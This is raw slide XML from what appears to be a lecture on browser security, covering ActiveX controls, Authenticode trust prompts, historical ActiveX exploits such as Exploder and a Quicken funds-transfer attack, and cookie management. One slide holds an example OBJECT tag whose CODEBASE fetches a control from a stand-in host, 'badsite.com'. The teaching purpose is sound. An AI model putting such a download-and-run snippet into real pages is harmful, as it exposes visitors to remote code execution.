        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178185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an ActiveX Control </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>&lt;HTML&gt; &lt;HEAD&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>&lt;TITLE&gt; Draw a Square &lt;/TITLE&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>&lt;/HEAD&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>&lt;BODY&gt; Here is an example ActiveX reference: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&lt;OBJECT&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>="Sample“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	CODEBASE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>www.badsite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/controls/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>stop.ocx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	HEIGHT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>="101“</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	WIDTH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>="101“ CLASSID="clsid:0342D101-2EE9-1BAF-34565634EB71" &gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>PARAM NAME="Version" VALUE=45445"&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>PARAM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>NAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ExtentX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>" VALUE="3001"&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>PARAM NAME="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ExtentY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>VALUE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>="2445"&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>OBJECT&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>BODY&gt; &lt;/HTML&gt;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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94144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Authenticode in ActiveX </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="2566947"/>
            <a:ext cx="5527040" cy="6188570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This signed ActiveX control ask the user for permission to run </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If approved, the control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>will run with the same privileges as the user </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The “Always trust content from ...” checkbox automatically accepts controls by the same publisher </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Probably a bad idea </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="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1120" y="3008671"/>
            <a:ext cx="6407507" cy="5604387"/>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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17225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Trusted/Untrusted ActiveX controls </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Trusted publishers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  List stored in the Windows registry </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  Malicious ActiveX controls can modify the registry table to make their publisher trusted </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  All future controls by that publisher run without prompting user </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unsigned controls </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  The prompt states that the control is unsigned and gives an accept/reject option </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  Even if you reject the control, it has already been downloaded to a temporary folder where it remains </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  It is not executed if rejected, but not removed either </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20444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ActiveX Exploits </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Exploder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Runner </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>controls designed by Fred McLain </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploder was an ActiveX control for which he purchased a VeriSign </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>digital signature </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The control would power down the machine </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Runner was a control that simply opened up a DOS prompt While </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>harmless, the control easily could have executed format C: or some other malicious command </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.halcyon.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mclain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/ActiveX/Exploder/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FAQ.htm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Quicken </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>exploit by a German hacking club </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Intuit’s Quicken is personal financial management tool </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Can be configured to auto-login to bank and credit card sites </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The control that would search the computer for Quicken and execute a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>transaction that transfers user funds to their account </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200"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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="207833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
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Cookies are a small bit of information stored on a computer associated with a specific server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  When you access a specific website, it might store information as a cookie </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Every time you revisit that server, the cookie is re-sent to the server </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Effectively used to hold state information over sessions </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies can hold any type of information </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– Can also hold sensitive information </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		• This includes passwords, credit card information, social security number, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>		• Session cookies, non-persistent cookies, persistent cookies </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	– Almost every large website uses cookies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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133159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Cookies </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies are stored on your computer and can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>controlled </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  However</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, many sites require that you enable cookies in order to use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>site </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Their storage on your computer naturally lends itself to exploits (Think </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>about how ActiveX could exploit cookies...) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You can (and probably should) clear your cookies on a regular basis </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most browsers will also have ways to turnoff cookies, exclude certain sites </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from adding cookies, and accept only certain sites' cookies </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies expire </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The expiration is set by the sites’ session by default, which is chosen by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  This means that cookies will probably stick around for a while</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="uk-UA" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="uk-UA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6678584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Care of Your Cookies </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRP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21120" y="2280180"/>
            <a:ext cx="5955695" cy="5682054"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>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Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Managing your cookies in Firefox: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remove Cookie </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Remove All Cookies </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Displays information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of individual cookies </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>–  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also tells names of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>cookies, which probably gives a good idea of what the cookie stores </a:t>
            </a:r>
          </a:p>
          <a:p>
